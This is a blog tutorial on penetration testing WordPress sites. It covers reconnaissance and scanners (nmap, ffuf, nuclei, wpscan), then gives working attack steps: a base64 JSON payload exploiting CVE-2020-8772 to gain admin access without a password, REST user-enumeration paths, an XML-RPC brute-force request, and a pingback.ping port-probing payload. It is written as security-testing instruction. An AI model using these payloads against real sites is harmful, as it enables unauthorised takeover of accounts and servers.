You are currently viewing Mastering WordPress Penetration Testing: A Step-by-Step Guide
<span class="bsf-rt-reading-time"><span class="bsf-rt-display-label" prefix=""></span> <span class="bsf-rt-display-time" reading_time="12"></span> <span class="bsf-rt-display-postfix" postfix="min read"></span></span><!-- .bsf-rt-reading-time -->

Mastering WordPress Penetration Testing: A Step-by-Step Guide

In this comprehensive guide, we’ll explore various aspects of WordPress penetration testing. Starting with gathering information using tools like Wappalyzer and WPintel. We’ll then dive into WordPress penetration testing with tools such as NMAP, FFuF, Nuclei, and Wpscan to uncover vulnerabilities. We’ll discuss exploiting specific vulnerabilities, manual approaches like username enumeration, and XML-RPC vulnerabilities. Understanding Cross-Site Port Attacks (XSPA) will enhance our knowledge. Lastly, we’ll explore online platforms to scan WordPress sites, providing a complete view of WordPress security.

If you haven’t already, make sure to check out our article on creating a secure WordPress website for essential insights before continuing further.

WordPress

WordPress is a widely used, open-source content management system (CMS) that allows users to create and manage websites and blogs. Originally developed as a blogging platform, it has evolved into a versatile CMS used for a wide range of websites, from personal blogs to business websites, e-commerce stores, forums, and more. It’s built on PHP and uses a MySQL database to store content and configuration settings. WordPress is known for its user-friendly interface, extensibility, and vibrant community.

WordPress’s flexibility, ease of use, and extensive ecosystem of themes and plugins make it a popular choice for individuals and businesses seeking to establish an online presence without requiring advanced technical skills.

Gather Information – Browser Extensions

In this phase, we will gather information about WordPress using some basic browser extensions. With the help of these extensions, we will obtain information such as the version and technology used by the web applications, installed plugins, and using another plugin, We will attempt basic tasks like username enumeration, detecting vulnerable plugins or WordPress versions, etc.

Wappalyzer

Wappalyzer, a versatile technology profiler, significantly enhances penetration testing. By revealing a website’s underlying technologies, including CMS, frameworks, programming languages, analytics tools, and more, it guides testers in crafting precise strategies. This information aids in vulnerability identification, attack vector selection, and overall testing accuracy, making Wappalyzer an essential tool for effective penetration testing. By harnessing the power of Wappalyzer, ethical hackers enhance their data-driven exploits, pinpoint vulnerabilities, and promote heightened cybersecurity for their clients.

In the scenario below, we’ve acquired insights into the versions of WordPress, PHP, and other pertinent technologies. These insights serve as valuable resources for penetration testers, enabling them to uncover potential security vulnerabilities associated with these specific versions.

Screenshot showing Wappalyzer Browser Extension
The Screenshot shows the Wappalyzer Browser Extension

WPintel

WPintel is a game-changer, allowing testers to efficiently scan self-hosted WordPress sites and unveil crucial information such as version details, vulnerabilities, plugins, themes, user insights, and more. By providing this comprehensive data, WPintel equips penetration testers with the knowledge they need to strategize targeted attacks, efficiently exploit vulnerabilities, and enhance the overall effectiveness of the testing process.

Here are the capabilities you can leverage during your penetration testing:

  • Version Detection & Vulnerability Assessment: Identify the WordPress version and its associated vulnerabilities.
  • Themes & Plugins Insight: Obtain details about installed themes and plugins for potential exploitation.
  • User Enumeration Support: Facilitate username enumeration to identify possible targets.
  • User Registration: Verify if user registration is enabled on the site, aiding in accessing the site.
  • Path Disclosure Detection: Identify exposed paths and potential disclosure of sensitive site information.
Screenshot showing the capability of WPintel Browser Extension
The Screenshot shows the capability of WPintel Browser Extension

WordPress Penetration Testing – Tools

WordPress penetration testing employs a suite of tools for rigorous security evaluation. NMAP scans for open ports, FFuF checks for any sensitive files by fuzzing, Nuclei hunts misconfigurations, and Wpscan scrutinizes WordPress-specific vulnerabilities. These tools collectively bolster website defenses against potential threats.

NMAP

Nmap is an open-source tool that’s indispensable for network exploration and security audits. It uncovers active devices, pinpoints services, and maps networks. Valuable for both administrators and security experts, Nmap enhances network understanding and strengthens defenses by revealing open ports, operating systems, and potential vulnerabilities.

Certainly, here are some of the most commonly used options in Nmap:

  • -sS: TCP SYN scan (stealthy and fast)
  • -sV: Version detection
  • -p <port ranges>: Specify ports to scan
  • -A: Aggressive scan (OS detection, version detection, scripts)
  • -O: OS detection
  • -T<0-5>: Timing template for scan speed
  • --script <script>: Execute NSE scripts
  • -oN <filename>: Save output in normal format
  • -oX <filename>: Save output in XML format
  • -v: Increase verbosity
  • -h: Display help information

These options cover a range of essential tasks such as port scanning, version detection, OS detection, aggressive scans, and script execution. They provide a solid foundation for network exploration and security assessments using Nmap.

In the example provided below, we’ve utilized the -sS option. This option triggers a TCP SYN scan, a frequently employed method for scanning. A TCP SYN scan assists in discerning the status of TCP ports on a designated system, indicating whether they are open, closed, or being filtered by a firewall. From the received response, it’s evident that port 80 is accessible, and there’s an active service running on that specific port.

nmap -sS domain.com
Screenshot showing the nmap scan results
The Screenshot shows the nmap scan results

FFuF

First, we will learn what is Fuzzing? Fuzzing involves the automated procedure of supplying arbitrary inputs to an application, with the intention of identifying errors or unanticipated behaviors. It’s worth noting that the exploration of concealed directories and files on a web server can also fall within the realm of fuzzing.

FFUF is an adaptable and multifunctional open-source fuzzing tool that serves a range of purposes. Its capabilities encompass a spectrum of functionalities, including general directory discovery with the flexibility to fuzz at any point within a URL, VHOST discovery even in the absence of DNS records, and comprehensive fuzzing employing diverse HTTP methods. This tool empowers users with the ability to uncover vulnerabilities and reveal insights that extend across various application landscapes.

In the example provided below, we’ve utilized the following command to perform fuzzing for a particular file on the endpoint. This command’s output will display results when a 200 OK response is encountered, due to the utilization of the -mc option.

ffuf -w wordlist.txt -u http://domain.com/FUZZ -mc 200
Screenshot showing the FFuF scan results
The Screenshot shows the FFuF scan results

We used the FFuF tool to look around, like searching for hidden things on the server. This tool is good at finding sensitive stuff on a server. When we looked around the results of the FFuF tool, we found a file named info.php. When we opened that file, we saw sensitive information about the PHP Server. So, tools like FFuF can help us find sensitive files on a server.

Screenshot showing the information related to info.php file
The Screenshot shows the information related to “info.php” file

Enhance your online security with my straightforward penetration testing services. Protect your digital assets now. Learn More 

Nuclei

Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.

It is an open-source tool that encourages community contributions to the library of templates, and development of the codebase. This means whenever a new CVE is published, someone can create a Nuclei template and publish it for the security community to use.

In the example provided below, we’ve used the below command to start the scan on the WordPress site.

nuclei -u https://domain.com
Screenshot showing the Nuclei scan results
The Screenshot shows the Nuclei scan results

With Nuclei, we examined our WordPress website and uncovered important WordPress-related information. It also identified specific well-known vulnerabilities that could endanger our site. Upon inspecting the scan results, a notable discovery was made: a file named adminer.php was detected, which, unfortunately, is accessible by anyone on the internet. This particular file functions as the login portal for the PHP database. The versatile capabilities of Nuclei extend beyond this instance; it can be harnessed to unveil additional issues and information of similar nature, thereby enhancing the overall security and resilience of our website.

Screenshot Showing the adminer.php file
The Screenshot Shows the “adminer.php” file

Wpscan

WPScan is a powerful and widely used security tool specifically designed for assessing the security of WordPress websites. Its comprehensive set of features makes it an essential tool for both website owners and security professionals. Some of the key features of WPScan include:

  • Vulnerability Detection: WPScan scans WordPress websites to identify vulnerabilities, security issues, and potential threats, helping users proactively address these concerns.
  • Theme and Plugin Scanning: The tool examines installed themes and plugins for known vulnerabilities, ensuring that any potential weaknesses in these components are identified and can be addressed promptly.
  • User Enumeration: WPScan can enumerate WordPress usernames, aiding in identifying potential points of entry for unauthorized access.
  • Password Brute-Force: It provides the ability to conduct password brute-force attacks, allowing website owners to test the strength of their passwords and take necessary precautions to prevent unauthorized access.
  • Database Enumeration: WPScan can retrieve sensitive information from the WordPress database, assisting in identifying data that might be at risk.
  • Version Detection: The tool can determine the version of WordPress being used, which is crucial for identifying if a website is running outdated software that might be vulnerable to known exploits.
  • Publicly Known Vulnerabilities: WPScan can compare WordPress installations against a database of publicly known vulnerabilities, helping users stay informed about the security status of their websites.
  • Integration with Other Tools: It supports integration with other security tools, enabling a more comprehensive analysis of WordPress website security.
  • Regular Updates: WPScan’s database of vulnerabilities is frequently updated, ensuring that users have access to the latest information on potential security risks.

In essence, WPScan serves as a crucial tool to safeguard WordPress websites by pinpointing vulnerabilities and providing insights that empower website owners and security professionals to make informed decisions about their site’s security measures.

In the example provided, I used the below command to run WPscan on the WordPress site. To see all the details, you should make an account on the WPscan website and use the token in the below command.

 wpscan --url http://domain.com --api-token wpscan_token
Screenshot showing the wpscan scan results
The Screenshot shows the wpscan scan results

We did a scan, and from that, WPscan discovered CVE-2020-8772 which is a critical vulnerability. Remember, we talked about WPScan before – it’s a strong tool for keeping WordPress safe. Whenever you do penetration testing, always consider using WPScan. Next, I’ll demonstrate how we can exploit the CVE-2020-8772 vulnerability.

Exploit CVE-2020-8772

1. This is the front part of the WordPress application. You can see that we have not logged into the admin panel of the WordPress site.

Screenshot showing the WordPress application page
The Screenshot shows the WordPress application page

2. Create the base64 code using the below JSON Payload.

Payload: {“iwp_action”:”add_site”,”params”:{“username”:”admin”}}

Command: echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64

3. Refresh the WordPress site and intercept the request using Burp Suite.

4.  Append the base64-generated payload (that you got from the above steps) with the provided string found in the exploit URL like this.

Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

5. Right-click on the Burp Suite’s interceptor tab, and click on “change request method” to modify the request from GET to POST.

6. As shown below, replace the payload with the above payload.

Screenshot showing the updated payload
The Screenshot shows the updated payload

7. Click on “Intercept is on” to forward the request. Once you forward the request, you will see something like this.

Screenshot showing the content post payload injection
The Screenshot shows the content post-payload injection

8. Now, Navigate to the Homepage of the WordPress site. The attack was successful, and now you have access to the admin dashboard.

Screenshot showing that the user has admin access
The screenshot shows that the user has admin access

As evident, we have successfully accessed the admin panel without the need to input a username and password.

Screenshot showing that the user has full admin access
The screenshot shows that the user has full admin access

WordPress Penetration Testing – Manual

WordPress Penetration Testing involves a thorough evaluation of potential vulnerabilities within a WordPress setup. This includes WordPress Username Enumeration, which seeks to uncover valid usernames that could be exploited for unauthorized access. Additionally, it covers Common Vulnerabilities in XML-RPC, highlighting risks tied to the XML-RPC protocol commonly used in WordPress for remote communication. By addressing these aspects, organizations can enhance their WordPress security and guard against potential cyber threats.

Username Enumeration

User Enumeration refers to an attack where an intruder systematically examines a web application to uncover the login names associated with a WordPress-based website. Attackers use this technique to expose the usernames linked to a WordPress site.

For those assessing the security of WordPress sites, attention should be paid to REST endpoints. By default, the route /wp-json/wp/v2/users can list users. In the latest WordPress version, this reveals the username and encrypted email, a potential concern understood by experienced WordPress users.

Several methods for user enumeration are as follows:

?rest_route=/wp/v2/users 
/wp-json/wp/v2/users

In the provided screenshot, you can observe the enumerated username that can be utilized for logging into the admin console. Once you have obtained the username, you can attempt a password brute force attack to discover the correct password associated with that username.

Screenshot showing the result of username enumeration
The Screenshot shows the result of username enumeration

Common Vulnerabilities in XML-RPC

XML-RPC in WordPress serves as an API, which stands for “application program interface.” Its purpose is to facilitate communication between your WordPress site and developers crafting mobile apps, desktop apps, and various other services. The WordPress XML-RPC API empowers developers to create applications on your behalf that mimic many of the actions achievable through the web interface when you’re logged into WordPress.

The primary vulnerabilities linked with XML-RPC encompass brute force attacks and port scanning. Let’s delve into how these actions are carried out and explore how they can be strategically employed when testing a WordPress site for potential vulnerabilities.

BruteForce attack

When you attempt to open the “xmlrpc.php” file located at http://domain.com/xmlrpc.php, this is the response you encounter.

Screenshot showing that the XML-RPC is enabled on the server
The screenshot shows that the XML-RPC is enabled on the server

Right now, the initial step is to send a “POST” request. This request helps us find out what things we can do on a website. It’s like checking a menu before ordering food. We do this to see what methods we can use, and we might find one that we can use to attack the site.  To see all these methods, we send a POST request and include some specific information along with it. When we do this, the website sends back a message telling us all the different methods that are enabled on the server.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Screenshot showing the list of methods enabled on the server
The screenshot shows the list of methods enabled on the server

Check if the following methods are there. If they are, then we can go ahead with the attack:

wp.getUserBlogs
metaWeblog.getUsersBlogs
wp.getCategories

To carry out the brute-force attack, you’ll need to send the below payload in the request POST request body. If you have some usernames that work, that’s even more helpful. You can use wp-scan or “WP-JSON” , “rest_route” API to get the list of usernames. 

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
Screenshot showing the 403 response for incorrect password
The screenshot shows the 403 response for an incorrect password

Now, you can put this into Intruder and start trying the list of passwords one after another. When you type in the wrong password or the right one, the server will still show “200 OK.” But, you need to look at the size of the response message to figure out if the password is right or wrong. The response you get for the right password will look something like this:

Screenshot showing the successful login with username and password
The screenshot shows the successful login with username and password

Cross Site Port Attack  – XSPA 

Cross-site port Attack (XSPA) exploits an application’s oversight in verifying and sanitizing responses from remote servers. Attackers manipulate user URLs to proxy assaults on external servers, intranet devices, and the web server. This reveals service availability, like open ports and banners, and can even extract data unconventionally from remote services.

You can use the below method to scan the server’s ports as well.

pingback.ping
Screenshot showing that the "pingback.ping" method is enabled on the server
The screenshot shows that the “pingback.ping” method is enabled on the server

If you can find the pingback.ping method in the response, you can move forward and try to get a “pingback” on the server. You can use tools like Burp Suite collaborator, netcat, python server, or any server, – choose whatever you’re comfortable with. Send the below POST body data with your server address.

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Screenshot showing the error with the collaborator URL
The screenshot shows the error with the collaborator URL

Now I have checked my collaborator client and got a successful DNS and HTTP request, so it was confirmed that the website is vulnerable to XSPA attack

Screenshot showing that we got DNS and HHTp ping on Burp collaborator
The screenshot shows that we got DNS and HHTp ping on the Burp collaborator

Online Websites to scan WordPress websites

There are websites that can help you check your WordPress website’s security for free. You just need to enter your website’s address, and these websites will show you the results.

Conclusion

In conclusion, securing your WordPress website is paramount in today’s digital landscape. This guide has equipped you with tools and techniques, from browser extensions to powerful testing tools like NMAP and Nuclei, to enhance your website’s resilience. By understanding vulnerabilities like XML-RPC and XSPA, you’re well-prepared to take proactive steps. Online platforms for scanning WordPress sites offer added layers of security. With this knowledge, you’re empowered to ensure a safe online presence for both you and your users.

Piyush Kumawat

Ethical Hacker || Penetration Tester || Gamer || Blogger || Application Security Engineer

This Post Has 2 Comments

  1. muqsit

    You have stated different ways to hack a wordpress website, so how do we protect our website against any of the attacks you listed above

Leave a Reply